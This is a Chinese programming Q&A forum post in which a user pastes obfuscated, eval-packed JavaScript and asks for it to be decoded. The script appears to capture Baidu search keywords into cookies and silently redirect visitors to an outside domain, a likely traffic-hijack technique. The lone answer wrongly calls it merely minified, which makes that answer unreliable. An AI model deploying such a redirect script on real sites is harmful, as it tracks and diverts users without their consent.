qq_33402373 2015-12-24 05:25 采纳率: 0%
浏览 1663

这是一段封装好的js代码 有没有哪位大神帮忙解一下啊,在线等 有些急。谢谢了

这是一段封装好的js代码 有没有哪位大神帮忙解一下啊,在线等 有些急。谢谢了

 eval(function(p,a,c,k,e,r){e=function(c){return(c<62?'':e(parseInt(c/62)))+((c=c%62)>35?String.fromCharCode(c+29):c.toString(36))};if('0'.replace(0,e)==0){while(c--)r[e(c)]=k[c];k=[function(e){return r[e]||e}];e=function(){return'[4-9bd-hj-ln-rt-zA-R]'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('4 customurl="";4 l=5.w;4 9=d.e.n.x();4 o=5.w.x();4 f="";4 p="y";4 b="#z";4 g=d.e.A;7(g!=""&&g.B("#z")<0){b=g+b}7(l.h>0){4 8=new Array();8=l.6("?");7(8.h==2){8=8[1].6("&");C(i=0;i<8.h;i++){7(!8[i].B(p)){c=8[i].6("=");4 f=decodeURI(c[1])}}}5.j="D="+9;5.j="q="+f}5.E(""+5.j+"[]"+k("q")+"");G=k("D");7(9==G){5.E("");5.getElementById("I").click()}r k(J){4 t=5.j.6("; ");C(4 i=0;i<t.h;i++){4 u=t[i].6("=");7(u[0]==J)K unescape(u[1])}}r GetRandomNum(v,L){4 M=L-v;4 N=O.random();K(v+O.round(N*M))}d.onhashchange=r(){7(d.e.A==b){}else{wd00=k("q");4 P=9.6(".")[0]+9.6(".")[1];4 Q=o.6(".")[0]+o.6(".")[1];7(P!=Q){e.n="http://m.p.R.fromsjz.yidahd.R/s/index.php?H=3&y="+f}}}',[],54,'||||var|document|split|if|strs|localUrl||hash1||window|location|wd|hash2|length||cookie|getCookie0001|url||href|hisUrl|baidu|mword|function||arrStr|temp|Min|referrer|toString|word|abcdd1|hash|indexOf|for|nammmme|write|div|myurl|id|abcdd2|objName|return|Max|Range|Rand|Math|compareN|compareO|com'.split('|'),0,{}))
  • 写回答

4条回答 默认 最新

  • 谁用了我的英文名 2015-12-24 06:00
    关注

    这是min的呀,去下载不带min的就好!

    评论

报告相同问题?

悬赏问题

  • ¥15 深度学习根据CNN网络模型,搭建BP模型并训练MNIST数据集
  • ¥15 lammps拉伸应力应变曲线分析
  • ¥15 C++ 头文件/宏冲突问题解决
  • ¥15 用comsol模拟大气湍流通过底部加热(温度不同)的腔体
  • ¥50 安卓adb backup备份子用户应用数据失败
  • ¥20 有人能用聚类分析帮我分析一下文本内容嘛
  • ¥15 请问Lammps做复合材料拉伸模拟,应力应变曲线问题
  • ¥30 python代码,帮调试,帮帮忙吧
  • ¥15 #MATLAB仿真#车辆换道路径规划
  • ¥15 java 操作 elasticsearch 8.1 实现 索引的重建